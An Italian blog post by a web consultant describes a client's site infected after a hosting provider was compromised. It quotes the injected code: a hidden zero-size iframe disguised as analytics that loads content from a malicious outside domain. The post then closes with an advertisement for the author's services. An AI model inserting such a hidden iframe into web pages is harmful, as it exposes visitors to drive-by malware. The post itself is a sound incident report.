Thunder Provider con Virus

Il sito di un cliente da 2 giorni non visibile ricompare con un bel virus

  • il sito del provider stesso è stato off line evidentemente ha subito un brutto attacco
  • controllo fra i compagni di IP del dominio del mio cliente e verifico vari siti off line che ancora non hanno ripristinato
  • entrando nel sito parte l’antivirus che segnala un virus

A questo punto analizzo il codice e sorpresa un bel iframe che si maschera da codice di analytics vado a vedere questo ipotetico analytics.net e si capisce subito che niente ha a vedere con Google (evidentemente Google non ha registrato il altrimenti questo dominio non farebbe spam)

Codice incriminato
<iframe src=”http://m-analytics.net/arwe/?736361acd09ca9717c9462514beb5205″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

E’ la prima volta che mi capita questo iframe
Il danno al cliente è notevole e puo diventare una catastrofe se non autorizza in fretta il trasferimento
Inoltre vanno pulite tutte le pagine comprese quelle in lingua e quelle dei 2 blog appoggiati sullo stesso dominio.

CERTO CHE IL WEB DIVENTA SEMPRE PIU UNA JUNGLA

—————————————–
Vuoi sapere quanto tempo istruzione è necessario per ristrutturare il tuo sito in proprio? 
Vuoi sapere se ci sono le condizioni per realizzare questa strategia per il tuo sito?
Vuoi sapere quanto puoi risparmiare con questo sistema?
 

Telefonami al 3398736464 o lascia un commento
———————————-

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *